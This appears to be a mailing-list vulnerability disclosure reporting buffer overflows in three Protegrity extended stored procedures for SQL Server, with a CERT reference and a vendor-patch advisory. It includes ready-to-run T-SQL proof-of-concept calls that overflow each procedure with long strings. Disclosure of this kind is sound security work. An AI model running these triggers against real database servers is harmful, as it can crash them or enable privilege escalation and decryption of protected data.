Additional details can be found at http://www.kb.cert.org/vuls/id/247545 There is a company that does encryption of databases called Protegrty. They use extended stored procedures to do the encryption and decryption. I tested 3 of the extended stored procedures and found all 3 vulnerable to buffer overflows. DECLARE @test varchar(8000) SET @test = (SELECT replicate('x',1926)) execute master.dbo.xp_pty_checkusers 'as', @test DECLARE @test varchar(8000) SET @test = (SELECT replicate('x',850)) execute master.dbo.xp_pty_insert @test, @test, @test DECLARE @test varchar(8000) SET @test = (SELECT replicate('x',850)) execute master.dbo.xp_pty_select @test, @test, @test These security holes are fully exploitable and would allow an attacker to perform any of the following: 1)become sa on the box 2)gain control of the operating system 3)decrypt the sensitive data Protegrity is encrypting If you have this software, contact the vendor for the patch. __________________________________________________ Do you Yahoo!? Yahoo! Web Hosting - establish your business online http://webhosting.yahoo.com
